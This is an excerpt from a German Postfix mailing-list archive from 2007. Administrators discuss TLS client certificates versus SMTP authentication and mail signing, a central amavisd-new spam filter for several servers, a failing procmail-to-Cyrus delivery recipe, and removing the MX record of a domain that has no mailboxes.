Dateigröße : 3035 bytes Beschreibung: S/MIME Cryptographic Signature URL : From p at state-of-mind.de Sun Nov 4 18:39:34 2007 From: p at state-of-mind.de (Patrick Ben Koetter) Date: Sun, 4 Nov 2007 18:39:34 +0100 Subject: [Postfixbuch-users] postfix und Clientzertifikate In-Reply-To: <472DF25C.1090800@marcomartinez.de> References: <472CC915.3020708@marcomartinez.de> <472CD461.3090803@lab.swapon.de> <472DF25C.1090800@marcomartinez.de> Message-ID: <20071104173934.GC10692@state-of-mind.de> * Marco Estrada Martinez : > >Nein, die x509 Zertifikate die Postfix benutzt, sind an Hosts gebunden. > >Personen/User etc. sind in diesem Zusammenhang irrelevant. Also: jeder > >MTA hat sein Zertifikat. Mit seinem Hostnamen an CN. > > mh dass ist natürlich schade. das würde ja bedeuten das ein und die > selbe Person zwei Clientzertifikate benötigt (Wenn er zwei PC nutzt). > Ich bin aber der Meinung das mit dem ausstellen des Clientzertifikates > "Ich" als CA "unterschreibe" das es sich um die Person handelt. Oder? Die einzige, flächendeckend in den gebräuchlichen MUAs nutzbare Methode, um User eindeutig zu identifizieren, ist SMTP Authentifizierung. Die einzige Methode, um den Zugriff auf bestimmte Envelope-Sender einzuschränken ist es mit smtpd_sasl_login_maps den SASL Loginnamen and einen Envelope-Sender zu binden. TLS Zertifikate sind zwar in wenigen MUAs an eine Person bindbar, aber deren Verbreitung ist in Windows-Landschaften nicht der Regelfall. p at rick -- Postfix - Einrichtung, Betrieb und Wartung saslfinger (debugging SMTP AUTH): From marco at marcomartinez.de Sun Nov 4 19:19:14 2007 From: marco at marcomartinez.de (Marco Estrada Martinez) Date: Sun, 04 Nov 2007 19:19:14 +0100 Subject: [Postfixbuch-users] postfix und Clientzertifikate In-Reply-To: <20071104173934.GC10692@state-of-mind.de> References: <472CC915.3020708@marcomartinez.de> <472CD461.3090803@lab.swapon.de> <472DF25C.1090800@marcomartinez.de> <20071104173934.GC10692@state-of-mind.de> Message-ID: <472E0D22.4050300@marcomartinez.de> Patrick Ben Koetter schrieb: > * Marco Estrada Martinez : > >>> Nein, die x509 Zertifikate die Postfix benutzt, sind an Hosts gebunden. >>> Personen/User etc. sind in diesem Zusammenhang irrelevant. Also: jeder >>> MTA hat sein Zertifikat. Mit seinem Hostnamen an CN. >>> >> mh dass ist natürlich schade. das würde ja bedeuten das ein und die >> selbe Person zwei Clientzertifikate benötigt (Wenn er zwei PC nutzt). >> Ich bin aber der Meinung das mit dem ausstellen des Clientzertifikates >> "Ich" als CA "unterschreibe" das es sich um die Person handelt. Oder? >> > > Die einzige, flächendeckend in den gebräuchlichen MUAs nutzbare Methode, um > User eindeutig zu identifizieren, ist SMTP Authentifizierung. > OK das sehe ich ein. Wollte aber die Zertifikate nur nebenbei zur Authentifizierung nutzen. Wollte sie eigentlich auch dazu nutzen damit meine User Ihre Mail digital unterschreiben können. In diesem Fall wäre es aber nicht korrekt wenn es pro Person mehrere Zertifikate gibt. Wenn ich dich dann richtig verstehe. Müsste ich meinem postfix das mit den Zertifikaten abgewöhnen und ihn per smtp_auth gegenüber dem Mailserver authentifizieren und das clientzertifikat nur als Einrichtung im mta als digitale Unterschrift. Oder eins für die Kommunikation zwischen mta und mailserver (für jeden client eines) und ein zertifikat pro Person zum digitalen unterschreiben, Oder gibt es andere Vorgehen. THX & Grüße Marco > Die einzige Methode, um den Zugriff auf bestimmte Envelope-Sender > einzuschränken ist es mit smtpd_sasl_login_maps den SASL Loginnamen and einen > Envelope-Sender zu binden. > > TLS Zertifikate sind zwar in wenigen MUAs an eine Person bindbar, aber deren > Verbreitung ist in Windows-Landschaften nicht der Regelfall. > > p at rick > > -- Diese Mail ist digital unterschrieben, Sie ist nur gültig mit dem folgenden Fingerprint: This mail is digitally signed, it is only valid with the following Fingerprint: MD5-Fingerprint: 20:58:47:18:43:33:B5:F3:D4:15:DB:F5:D9:91:EA:2C -------------- nächster Teil -------------- Ein Dateianhang mit Binärdaten wurde abgetrennt... Dateiname : smime.p7s Dateityp : application/x-pkcs7-signature Dateigröße : 3035 bytes Beschreibung: S/MIME Cryptographic Signature URL : From p at state-of-mind.de Sun Nov 4 19:39:29 2007 From: p at state-of-mind.de (Patrick Ben Koetter) Date: Sun, 4 Nov 2007 19:39:29 +0100 Subject: [Postfixbuch-users] postfix und Clientzertifikate In-Reply-To: <472E0D22.4050300@marcomartinez.de> References: <472CC915.3020708@marcomartinez.de> <472CD461.3090803@lab.swapon.de> <472DF25C.1090800@marcomartinez.de> <20071104173934.GC10692@state-of-mind.de> <472E0D22.4050300@marcomartinez.de> Message-ID: <20071104183929.GA11713@state-of-mind.de> * Marco Estrada Martinez : > Patrick Ben Koetter schrieb: > >* Marco Estrada Martinez : > > > >>>Nein, die x509 Zertifikate die Postfix benutzt, sind an Hosts gebunden. > >>>Personen/User etc. sind in diesem Zusammenhang irrelevant. Also: jeder > >>>MTA hat sein Zertifikat. Mit seinem Hostnamen an CN. > >>> > >>mh dass ist natürlich schade. das würde ja bedeuten das ein und die > >>selbe Person zwei Clientzertifikate benötigt (Wenn er zwei PC nutzt). > >>Ich bin aber der Meinung das mit dem ausstellen des Clientzertifikates > >>"Ich" als CA "unterschreibe" das es sich um die Person handelt. Oder? > >> > > > >Die einzige, flächendeckend in den gebräuchlichen MUAs nutzbare Methode, > >um User eindeutig zu identifizieren, ist SMTP Authentifizierung. > > OK das sehe ich ein. Wollte aber die Zertifikate nur nebenbei zur > Authentifizierung nutzen. Wollte sie eigentlich auch dazu nutzen damit > meine User Ihre Mail digital unterschreiben können. In diesem Fall wäre > es aber nicht korrekt wenn es pro Person mehrere Zertifikate gibt. Wenn Also ich will keine lange Debatte um dieses Thema machen. Nur fürs Protokoll: Natürlich kann eine Person mehrere Zertifikate besitzen und sie fallweise einsetzen. Der Administrationsaufwand ist einfach exponential unsinnig. Von Debuggen im Alltag gar nicht zu sprechen. Wenn Du willst, das Deine Leute ohne viel Aufhebens signieren, dann setze ein zentrales Krypto-Gateway ein. > ich dich dann richtig verstehe. Müsste ich meinem postfix das mit den > Zertifikaten abgewöhnen und ihn per smtp_auth gegenüber dem Mailserver > authentifizieren und das clientzertifikat nur als Einrichtung im mta als > digitale Unterschrift. Oder eins für die Kommunikation zwischen mta und Nein. Deiner User schreiben ihre Mail sicherlich nicht in Postfix oder Sendmail, sondern sie nutzen Outlook oder Thunnderbird. Dort, in diesen MUA, muß die Signierung oder Authentifizierung stattfinden. Ob das dann auf einem Laptop stattfindet und ob der dann noch zusätzlich ein Postfix installiert hat, um die Mails nach TLS-Clientzertifikat-Authentifizierung über ein zentrales Gateway zu relayen, ist eine andere Sache. > mailserver (für jeden client eines) und ein zertifikat pro Person zum > digitalen unterschreiben, Oder gibt es andere Vorgehen. Von welcher Art Signatur sprichst Du eigentlich? Willst Du, das der Client sich mit einem TLS-Zertifikat gegenüber dem Server ausweist und das im Header vermerkt wird? Willst Du den Body der Mail signieren, damit die Urheberschaft vermerkt ist? Oder willst Du pro Sender eine eigene DKIM-Signatur im Header der Mail vermerken? p at rick > > THX & Grüße Marco > >Die einzige Methode, um den Zugriff auf bestimmte Envelope-Sender > >einzuschränken ist es mit smtpd_sasl_login_maps den SASL Loginnamen and > >einen > >Envelope-Sender zu binden. > > > >TLS Zertifikate sind zwar in wenigen MUAs an eine Person bindbar, aber > >deren > >Verbreitung ist in Windows-Landschaften nicht der Regelfall. > > > >p at rick > > > > > > > -- > Diese Mail ist digital unterschrieben, Sie ist nur gültig mit dem > folgenden Fingerprint: > > This mail is digitally signed, it is only valid with the following > Fingerprint: > > MD5-Fingerprint: 20:58:47:18:43:33:B5:F3:D4:15:DB:F5:D9:91:EA:2C > > -- > _______________________________________________ > Postfixbuch-users -- http://www.postfixbuch.de > Heinlein Professional Linux Support GmbH > > Postfixbuch-users at listi.jpberlin.de > https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users -- Postfix - Einrichtung, Betrieb und Wartung saslfinger (debugging SMTP AUTH): From marco at marcomartinez.de Sun Nov 4 20:07:37 2007 From: marco at marcomartinez.de (Marco Estrada Martinez) Date: Sun, 04 Nov 2007 20:07:37 +0100 Subject: [Postfixbuch-users] postfix und Clientzertifikate In-Reply-To: <20071104183929.GA11713@state-of-mind.de> References: <472CC915.3020708@marcomartinez.de> <472CD461.3090803@lab.swapon.de> <472DF25C.1090800@marcomartinez.de> <20071104173934.GC10692@state-of-mind.de> <472E0D22.4050300@marcomartinez.de> <20071104183929.GA11713@state-of-mind.de> Message-ID: <472E1879.6030002@marcomartinez.de> Patrick Ben Koetter schrieb: > * Marco Estrada Martinez : > >> Patrick Ben Koetter schrieb: >> >>> * Marco Estrada Martinez : >>> >>> >>>>> Nein, die x509 Zertifikate die Postfix benutzt, sind an Hosts gebunden. >>>>> Personen/User etc. sind in diesem Zusammenhang irrelevant. Also: jeder >>>>> MTA hat sein Zertifikat. Mit seinem Hostnamen an CN. >>>>> >>>>> >>>> mh dass ist natürlich schade. das würde ja bedeuten das ein und die >>>> selbe Person zwei Clientzertifikate benötigt (Wenn er zwei PC nutzt). >>>> Ich bin aber der Meinung das mit dem ausstellen des Clientzertifikates >>>> "Ich" als CA "unterschreibe" das es sich um die Person handelt. Oder? >>>> >>>> >>> Die einzige, flächendeckend in den gebräuchlichen MUAs nutzbare Methode, >>> um User eindeutig zu identifizieren, ist SMTP Authentifizierung. >>> >> OK das sehe ich ein. Wollte aber die Zertifikate nur nebenbei zur >> Authentifizierung nutzen. Wollte sie eigentlich auch dazu nutzen damit >> meine User Ihre Mail digital unterschreiben können. In diesem Fall wäre >> es aber nicht korrekt wenn es pro Person mehrere Zertifikate gibt. Wenn >> > > Also ich will keine lange Debatte um dieses Thema machen. Nur fürs Protokoll: > Natürlich kann eine Person mehrere Zertifikate besitzen und sie fallweise > einsetzen. Der Administrationsaufwand ist einfach exponential unsinnig. Von > Debuggen im Alltag gar nicht zu sprechen. > > Wenn Du willst, das Deine Leute ohne viel Aufhebens signieren, dann setze ein > zentrales Krypto-Gateway ein. > > > >> ich dich dann richtig verstehe. Müsste ich meinem postfix das mit den >> Zertifikaten abgewöhnen und ihn per smtp_auth gegenüber dem Mailserver >> authentifizieren und das clientzertifikat nur als Einrichtung im mta als >> digitale Unterschrift. Oder eins für die Kommunikation zwischen mta und >> > > Nein. Deiner User schreiben ihre Mail sicherlich nicht in Postfix oder > Sendmail, sondern sie nutzen Outlook oder Thunnderbird. Dort, in diesen MUA, > muß die Signierung oder Authentifizierung stattfinden. > > Ob das dann auf einem Laptop stattfindet und ob der dann noch zusätzlich ein > Postfix installiert hat, um die Mails nach TLS-Clientzertifikat-Authentifizierung > über ein zentrales Gateway zu relayen, ist eine andere Sache. > > > >> mailserver (für jeden client eines) und ein zertifikat pro Person zum >> digitalen unterschreiben, Oder gibt es andere Vorgehen. >> > > Von welcher Art Signatur sprichst Du eigentlich? Willst Du, das der Client > sich mit einem TLS-Zertifikat gegenüber dem Server ausweist und das im Header > vermerkt wird? > > Willst Du den Body der Mail signieren, damit die Urheberschaft vermerkt ist? > Mir wäre wichtig das der User (Person) die Mail signiert um die Urheberschaft "nachzuweisen". Also deine zweite Aussage. THX Marco > Oder willst Du pro Sender eine eigene DKIM-Signatur im Header der Mail > vermerken? > > p at rick > > > > > >> THX & Grüße Marco >> >>> Die einzige Methode, um den Zugriff auf bestimmte Envelope-Sender >>> einzuschränken ist es mit smtpd_sasl_login_maps den SASL Loginnamen and >>> einen >>> Envelope-Sender zu binden. >>> >>> TLS Zertifikate sind zwar in wenigen MUAs an eine Person bindbar, aber >>> deren >>> Verbreitung ist in Windows-Landschaften nicht der Regelfall. >>> >>> p at rick >>> >>> >>> >> -- >> Diese Mail ist digital unterschrieben, Sie ist nur gültig mit dem >> folgenden Fingerprint: >> >> This mail is digitally signed, it is only valid with the following >> Fingerprint: >> >> MD5-Fingerprint: 20:58:47:18:43:33:B5:F3:D4:15:DB:F5:D9:91:EA:2C >> >> > > > > >> -- >> _______________________________________________ >> Postfixbuch-users -- http://www.postfixbuch.de >> Heinlein Professional Linux Support GmbH >> >> Postfixbuch-users at listi.jpberlin.de >> https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users >> > > -- Diese Mail ist digital unterschrieben, Sie ist nur gültig mit dem folgenden Fingerprint: This mail is digitally signed, it is only valid with the following Fingerprint: MD5-Fingerprint: 20:58:47:18:43:33:B5:F3:D4:15:DB:F5:D9:91:EA:2C -------------- nächster Teil -------------- Ein Dateianhang mit Binärdaten wurde abgetrennt... Dateiname : smime.p7s Dateityp : application/x-pkcs7-signature Dateigröße : 3035 bytes Beschreibung: S/MIME Cryptographic Signature URL : From p at state-of-mind.de Sun Nov 4 22:05:01 2007 From: p at state-of-mind.de (Patrick Ben Koetter) Date: Sun, 4 Nov 2007 22:05:01 +0100 Subject: [Postfixbuch-users] postfix und Clientzertifikate In-Reply-To: <472E1879.6030002@marcomartinez.de> References: <472CC915.3020708@marcomartinez.de> <472CD461.3090803@lab.swapon.de> <472DF25C.1090800@marcomartinez.de> <20071104173934.GC10692@state-of-mind.de> <472E0D22.4050300@marcomartinez.de> <20071104183929.GA11713@state-of-mind.de> <472E1879.6030002@marcomartinez.de> Message-ID: <20071104210501.GA13691@state-of-mind.de> * Marco Estrada Martinez : > >Nein. Deiner User schreiben ihre Mail sicherlich nicht in Postfix oder > >Sendmail, sondern sie nutzen Outlook oder Thunnderbird. Dort, in diesen > >MUA, muß die Signierung oder Authentifizierung stattfinden. > > > >Ob das dann auf einem Laptop stattfindet und ob der dann noch zusätzlich > >ein Postfix installiert hat, um die Mails nach > >TLS-Clientzertifikat-Authentifizierung über ein zentrales Gateway zu > >relayen, ist eine andere Sache. > > > > > >>mailserver (für jeden client eines) und ein zertifikat pro Person zum > >>digitalen unterschreiben, Oder gibt es andere Vorgehen. > >> > > > >Von welcher Art Signatur sprichst Du eigentlich? Willst Du, das der Client > >sich mit einem TLS-Zertifikat gegenüber dem Server ausweist und das im > >Header vermerkt wird? > > > >Willst Du den Body der Mail signieren, damit die Urheberschaft vermerkt > >ist? > > > > Mir wäre wichtig das der User (Person) die Mail signiert um die > Urheberschaft "nachzuweisen". Also deine zweite Aussage. Das ist eine Aufgabe, die entweder von der Person im MUA wahrgenommen wird (S/MIME, PGP, GnuPG) oder zentral im Krypto-Gateway. Produkte für Krypto-Gateways musst Du ggf. selber recherchieren. Wenn Du im MUA signieren willst, hängt es vom Produkt ab welche Signatur-Methode Du nutzen kannst. Zusätzlich bringt z.B. S/MIME üblicherweise noch Kosten für Signierung der Zertifikate durch eine kommerzielle PKI mit sich. Welche Mailclients mußt Du denn versorgen? p at rick > THX Marco > >Oder willst Du pro Sender eine eigene DKIM-Signatur im Header der Mail > >vermerken? > > > >p at rick > > > > > > > > > > > >>THX & Grüße Marco > >> > >>>Die einzige Methode, um den Zugriff auf bestimmte Envelope-Sender > >>>einzuschränken ist es mit smtpd_sasl_login_maps den SASL Loginnamen and > >>>einen > >>>Envelope-Sender zu binden. > >>> > >>>TLS Zertifikate sind zwar in wenigen MUAs an eine Person bindbar, aber > >>>deren > >>>Verbreitung ist in Windows-Landschaften nicht der Regelfall. > >>> > >>>p at rick > >>> > >>> > >>> > >>-- > >>Diese Mail ist digital unterschrieben, Sie ist nur gültig mit dem > >>folgenden Fingerprint: > >> > >>This mail is digitally signed, it is only valid with the following > >>Fingerprint: > >> > >>MD5-Fingerprint: 20:58:47:18:43:33:B5:F3:D4:15:DB:F5:D9:91:EA:2C > >> > >> > > > > > > > > > >>-- > >>_______________________________________________ > >>Postfixbuch-users -- http://www.postfixbuch.de > >>Heinlein Professional Linux Support GmbH > >> > >>Postfixbuch-users at listi.jpberlin.de > >>https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users > >> > > > > > > > -- > Diese Mail ist digital unterschrieben, Sie ist nur gültig mit dem > folgenden Fingerprint: > > This mail is digitally signed, it is only valid with the following > Fingerprint: > > MD5-Fingerprint: 20:58:47:18:43:33:B5:F3:D4:15:DB:F5:D9:91:EA:2C > > -- > _______________________________________________ > Postfixbuch-users -- http://www.postfixbuch.de > Heinlein Professional Linux Support GmbH > > Postfixbuch-users at listi.jpberlin.de > https://listi.jpberlin.de/mailman/listinfo/postfixbuch-users -- Postfix - Einrichtung, Betrieb und Wartung saslfinger (debugging SMTP AUTH): From stefan at webetc.de Sun Nov 4 22:10:03 2007 From: stefan at webetc.de (stefan at webetc.de) Date: Sun, 4 Nov 2007 22:10:03 +0100 (CET) Subject: [Postfixbuch-users] Mehrere Mailserver und nur ein Spamfilter Message-ID: <63236.85.180.195.178.1194210603.squirrel@85.180.195.178> Hallo, ich betreue mehrere Postfix Mailserver und auch ein paar für unsere Kundschaft. Da die Einrichtung und Konfiguration eines gescheiten Spamfilters nichts ist, was man mal schnell und gerne macht und die Sache ja auch eine gewisse Pflege erfordert, bin ich es leid, das für jeden Server zu machen. Zumal die Server unterschiedlichster Art sind. Meist sind es irgendwelche "Rootserver" mit unterschiedlichen Linux Derivaten. Das Mailaufkommen ist insgesamt nicht soooo groß. ich Rechne mit unter 10000 Mails am Tag. Deshalb schwebt mir (mindestens) ein "zentraler" Server mit Spamfilter vor. Hat jemand eine solche Konfiguration schonmal gemacht? Auf der Suche nach Howto's bin ich nicht direkt fündig geworden. Oder findet ihr eine solche Konfiguration blödsinnig? Ich will den "Spamfilterserver" nicht als MX für die Domains eintragen, da ich sonst Empfaengerlisten auf diesem pflegen müsste. Ich dachte eher an amavisd-new oder Spamassassin pur, eingebunden als content_filter. Nur wie kommen die Mails dann zu ihrem passenden Mailserver? Ich hoffe, ich habe mich einigermassen verständlich ausgedrückt. Gruß Stefan From driessen at fblan.de Sun Nov 4 22:45:30 2007 From: driessen at fblan.de (Uwe Driessen) Date: Sun, 4 Nov 2007 22:45:30 +0100 Subject: [Postfixbuch-users] Mehrere Mailserver und nur ein Spamfilter In-Reply-To: <63236.85.180.195.178.1194210603.squirrel@85.180.195.178> References: <63236.85.180.195.178.1194210603.squirrel@85.180.195.178> Message-ID: <001d01c81f2c$04fab360$0565a8c0@uwe> stefan at webetc.de schrieb: > Ich will den "Spamfilterserver" nicht als MX für die Domains eintragen, da > ich sonst Empfaengerlisten auf diesem pflegen müsste. > Ich dachte eher an amavisd-new oder Spamassassin pur, eingebunden als > content_filter. Nur wie kommen die Mails dann zu ihrem passenden > Mailserver? Annahme auf dem jeweiligen Server Filter auf einem extra Server an den dann die Mails zur Prüfung geschickt werden und von dort aus dann wieder zurück zum Herkunftsserver Main.cf content_filter = smtp-amavis:[127.0.0.1]:10024 statt der 127.0.0.1 dann die Adresse des Spamfilterservers, für jeden einliefernden Server einen eigenen Port nehmen. in Amavis dann entsprechende Ports für die Auslieferung wieder definieren und an die Server zurückschicken. War auch schon eine Beschreibung hier in der Liste. 1. Überprüfung ob die Wahrscheinlichkeit von Spam nicht schon vor der Annahme geprüft werden kann (Greylisting(postgrey), policyd-weight) Die Beiden im Gespann sollten um die 90% und mehr von Spam schon mal filtern und können problemlos auf jedem Server eingebunden werden (false-positive nach meiner Erfahrung = 0) Ich persönlich würde die Spamfilterung auf jedem Server einzeln lassen wenn es unterschiedliche Kunden sind denn a will es jeder anders und b ist es dann genauso viel Aufwand wie die Regeln auf jedem Server einzeln zu machen (der eine will englische Sportnachrichten und Rennquoten der andere hat nur im Deutschsprachigen Raum zu tun und der Dritte hätte auch gerne die eine oder andere Entspannungsmail). Wird jeder Server einzeln betreut ergibt sich ein ganz anderes Spamfiltering wie wenn man alle gesamt über einen Kamm schert. Wird mit der Zeit eher contraproduktiv. Grundsätzliches verhindern von Spammails geschieht vor der Annahme alles was da hinter kommt ist dann nur noch nachbessern (so gut die Filter auch sind) > > Ich hoffe, ich habe mich einigermassen verständlich ausgedrückt. > > Gruß > Stefan > Mit freundlichen Grüßen Drießen -- Software & Computer Uwe Drießen Lembergstraße 33 67824 Feilbingert Tel.: 06708 / 660045 Fax: 06708 / 661397 From p.heinlein at heinlein-support.de Sun Nov 4 22:48:52 2007 From: p.heinlein at heinlein-support.de (Peer Heinlein) Date: Sun, 4 Nov 2007 22:48:52 +0100 Subject: [Postfixbuch-users] Mehrere Mailserver und nur ein Spamfilter In-Reply-To: <63236.85.180.195.178.1194210603.squirrel@85.180.195.178> References: <63236.85.180.195.178.1194210603.squirrel@85.180.195.178> Message-ID: <200711042248.52340.p.heinlein@heinlein-support.de> Am Sonntag, 4. November 2007 schrieb stefan at webetc.de: > Das Mailaufkommen ist insgesamt nicht soooo groß. ich Rechne mit unter > 10000 Mails am Tag. Deshalb schwebt mir (mindestens) ein "zentraler" > Server mit Spamfilter vor. Hat jemand eine solche Konfiguration > schonmal gemacht? Jau, ständig, weil es ab einer gewissen Größenordnung und Anzahl von MX-Servern Sinn machen kann, Amavis und die Postfix-Relays voneinander zu trennen. > Auf der Suche nach Howto's bin ich nicht direkt > fündig geworden. Oder findet ihr eine solche Konfiguration blödsinnig? Nein, klingt plausibel in Deinem Szenario. > Ich will den "Spamfilterserver" nicht als MX für die Domains eintragen, > da ich sonst Empfaengerlisten auf diesem pflegen müsste. [Nur am Rande: Müßtest Du nicht: http://www.postfix.org/ADDRESS_VERIFICATION_README.html > Ich dachte eher an amavisd-new oder Spamassassin pur, eingebunden als > content_filter. Nur wie kommen die Mails dann zu ihrem passenden > Mailserver? Wo ist der Unterschied zwischen: content_filter=smtp:[127.0.0.1] und content_filter=smtp:[192.168.10.20] ? (Alternativ natürlich auch mit Hostname statt einer IP.) Allerdings mußt Du dann noch in /etc/amavisd.conf zwei Anpassungen vornehmen: $inet_socket_bind = '*'; @inet_acl = qw( 127.0.0.0/8 192.168.0.0/16 [::1]); (Bzw. eben Dein IP-Netz) Lieben Gruß Peer -- Heinlein Professional Linux Support GmbH Linux: Akademie - Support - Hosting http://www.heinlein-support.de Zwangsangaben lt. §35a GmbHG: HRB 93818 B / Amtsgericht Berlin-Charlottenburg, Geschäftsführer: Peer Heinlein -- Sitz: Berlin From stefan at webetc.de Sun Nov 4 23:24:39 2007 From: stefan at webetc.de (stefan at webetc.de) Date: Sun, 4 Nov 2007 23:24:39 +0100 (CET) Subject: [Postfixbuch-users] Mehrere Mailserver und nur ein Spamfilter In-Reply-To: <200711042248.52340.p.heinlein@heinlein-support.de> References: <63236.85.180.195.178.1194210603.squirrel@85.180.195.178> <200711042248.52340.p.heinlein@heinlein-support.de> Message-ID: <64858.85.180.195.178.1194215079.squirrel@85.180.195.178> >> Ich will den "Spamfilterserver" nicht als MX für die Domains eintragen, >> da ich sonst Empfaengerlisten auf diesem pflegen müsste. > > [Nur am Rande: Müßtest Du nicht: > http://www.postfix.org/ADDRESS_VERIFICATION_README.html *vordiestirnklatsch*... ist schon ein paar Tage her, dass ich Sender address verification gemacht habe. Daher hätte ich es noch wissen müssen. >> Ich dachte eher an amavisd-new oder Spamassassin pur, eingebunden als >> content_filter. Nur wie kommen die Mails dann zu ihrem passenden >> Mailserver? > > Wo ist der Unterschied zwischen: > content_filter=smtp:[127.0.0.1] und > content_filter=smtp:[192.168.10.20] ? > (Alternativ natürlich auch mit Hostname statt einer IP.) Jap.. So hatte ich das auch gedacht. Ich meinte Emails, die von amavisd-new überprüft wurden, müssen ja wieder dem Postfix Zustellprozess zurückgeführt werden. Am einfachsten wäre sicherlich ein smtp, der auf einem anderen Port lauscht und keinen content_filter oder greylisting benutzt. Für die verschiedenen Domains mit einer transport map sicherlich so zu regeln: example.com relay:[123.123.123.123:26] example2.com relay:[111.111.111.111:26] example3.com relay:[222.222.222.222:26] oder? Wenn ja, komme ich irgendwie drumherum, diese transport map zu pflegen? Gruß Stefan From stefan at webetc.de Sun Nov 4 23:36:24 2007 From: stefan at webetc.de (stefan at webetc.de) Date: Sun, 4 Nov 2007 23:36:24 +0100 (CET) Subject: [Postfixbuch-users] Mehrere Mailserver und nur ein Spamfilter In-Reply-To: <64858.85.180.195.178.1194215079.squirrel@85.180.195.178> References: <63236.85.180.195.178.1194210603.squirrel@85.180.195.178> <200711042248.52340.p.heinlein@heinlein-support.de> <64858.85.180.195.178.1194215079.squirrel@85.180.195.178> Message-ID: <61003.85.180.195.178.1194215784.squirrel@85.180.195.178> >> Wo ist der Unterschied zwischen: >> content_filter=smtp:[127.0.0.1] und >> content_filter=smtp:[192.168.10.20] ? >> (Alternativ natürlich auch mit Hostname statt einer IP.) > > Jap.. So hatte ich das auch gedacht. > Ich meinte Emails, die von amavisd-new überprüft wurden, müssen ja wieder > dem Postfix Zustellprozess zurückgeführt werden. Am einfachsten wäre > sicherlich ein smtp, der auf einem anderen Port lauscht und keinen > content_filter oder greylisting benutzt. > Für die verschiedenen Domains mit einer transport map sicherlich so zu > regeln: > example.com relay:[123.123.123.123:26] > example2.com relay:[111.111.111.111:26] > example3.com relay:[222.222.222.222:26] > > oder? > > Wenn ja, komme ich irgendwie drumherum, diese transport map zu pflegen? Ich will meine Mail mal selbst beantworten: Zitat aus www.heinlein-support.de/upload/mk3/SpamAssassin-Geheimnisse.pdf : "amavis weiß über $forward_method, wohin die Mail zurückgeht" Wenn dem so ist, sind meine Fragen beantwortet ;o) Gruß Stefan From s.neukirchner at konabi.de Mon Nov 5 08:55:07 2007 From: s.neukirchner at konabi.de (Sven Neukirchner) Date: Mon, 5 Nov 2007 08:55:07 +0100 Subject: [Postfixbuch-users] procmailzustellung mit cyradmin Message-ID: <000001c81f81$2f4a4d60$96ffa8c0@nicos.local> Stimmt, ich meine natürlich: "/usr/sbin/cyrdeliver -a shared.Faxeingang" Hier mal ein Auszug aus meiner /etc/procmailrc _________________________________________________ # Procmail LOGFILE="/var/log/procmail.log" VERBOSE=on TAG=`date +%d` MONAT=`date +%m` JAHR=`date +%y` DELIVERMAIL="/usr/sbin/cyrdeliver" FAXBOX="$DELIVERMAIL -a shared.Faxeingang" # Faxe in Faxeingang :0w * ^To.*fax at mydomain | $FAXBOX __________________________________________________ Und hier ein Auszug aus dem Logfile: procmail: Assigning "FAXBOX=/usr/sbin/cyrdeliver -a shared.Faxeingang" procmail: Match on "^To.*fax at mydomain" procmail: Executing "/usr/sbin/cyrdeliver,-a,shared.Faxeingang" 421-4.3.0 usage: cyrdeliver [-C ] [-m mailbox] [-a auth] [-r return_path] [-l] [-D] 421 4.3.0 v2.2.13-Debian-2.2.13-10 procmail: Program failure (75) of "/usr/sbin/cyrdeliver" procmail: Assigning "LASTFOLDER=/usr/sbin/cyrdeliver -a shared.Faxeingang" Hier die Rechte für shared.Faxeingang: lam shared.Faxeingang anyone lrswipcda Viele Grüße Sven From rolf.mannhart at casanova.ch Mon Nov 5 08:59:16 2007 From: rolf.mannhart at casanova.ch (Rolf Mannhart - Casanova Digital) Date: Mon, 05 Nov 2007 08:59:16 +0100 Subject: [Postfixbuch-users] Webseite ohne Mailkonten Message-ID: <472ECD54.1030606@casanova.ch> Hallo zusammen, Ich habe hier nicht direkt ein Mail-Problem, sondern wäre einfach froh, wenn ich mir kurz Eure Meinungen dazu mitteilen könnt. Ich habe einen Kunden, welcher seine Webseite bei uns hosten lässt. Er ist einer der wenigen, welche keine Mailkonten besitzt. --schnipp aus mail.log-- Nov 4 23:51:24 mail postfix/smtpd[10276]: NOQUEUE: reject: RCPT from ns0.rathaus-seevetal.de[80.228.226.66]: 554 : Relay access denied; from=<> to= proto=SMTP helo= Nov 5 00:09:04 mail postfix/smtpd[12105]: NOQUEUE: reject: RCPT from ns0.rathaus-seevetal.de[80.228.226.66]: 554 : Relay access denied; from=<> to= proto=SMTP helo= --schnipp-- Postfix lehnt ja die Mails korrekt ab, somit eigentlich kein Problem. Da nun das Spamaufkommen immer mehr zunimmt, wollte ich fragen, was dagegen spricht, wenn ich den MX-Eintrag dieser Domaine entferne. Wie würdet Ihr mit einem solchen Fall umgehen? Gruss Rolf From Ralf.Hildebrandt at charite.de Mon Nov 5 09:03:57 2007 From: Ralf.Hildebrandt at charite.de (Ralf Hildebrandt) Date: Mon, 5 Nov 2007 09:03:57 +0100 Subject: [Postfixbuch-users] Webseite ohne Mailkonten In-Reply-To: <472ECD54.1030606@casanova.ch> References: <472ECD54.1030606@casanova.ch> Message-ID: <20071105080357.GC29014@charite.de> > Ich habe einen Kunden, welcher seine Webseite bei uns hosten lässt. Er > ist einer > der wenigen, welche keine Mailkonten besitzt. Wozu hat er dann einen MX record? > Postfix lehnt ja die Mails korrekt ab, somit eigentlich kein Problem. Genau. > Da nun das Spamaufkommen immer mehr zunimmt, wollte ich fragen, was dagegen > spricht, wenn ich den MX-Eintrag dieser Domaine entferne. Wie würdet Ihr > mit einem solchen > Fall umgehen? Welches Spamaufkommen? Die Mail wird doch gar nicht angenommen. -- Ralf Hildebrandt (Ralf.Hildebrandt at charite.de) plonk at charite.de Postfix - Einrichtung, Betrieb und Wartung Tel. +49 (0)30-450 570-155 http://www.arschkrebs.de If you tell them, they never listen. If they listen, they never learn. If they learn, they never remember. If they remember, they never obey. From methfessel at methfessel-computers.de Mon Nov 5 09:06:04 2007 From: methfessel at methfessel-computers.de (Methfessel Computers - Oliver Methfessel) Date: Mon, 05 Nov 2007 09:06:04 +0100 Subject: [Postfixbuch-users] Webseite ohne Mailkonten In-Reply-To: <472ECD54.1030606@casanova.ch> References: <472ECD54.1030606@casanova.ch> Message-ID: <472ECEEC.5010604@methfessel-computers.de> Hall Rolf, Rolf Mannhart - Casanova Digital schrieb: > --schnipp aus mail.log-- > Nov 4 23:51:24 mail postfix/smtpd[10276]: NOQUEUE: reject: RCPT from > ns0.rathaus-seevetal.de[80.228.226.66]: 554 > : Relay access denied; from=<> > to= proto=SMTP helo= > Nov 5 00:09:04 mail postfix/smtpd[12105]: NOQUEUE: reject: RCPT from > ns0.rathaus-seevetal.de[80.228.226.66]: 554 > 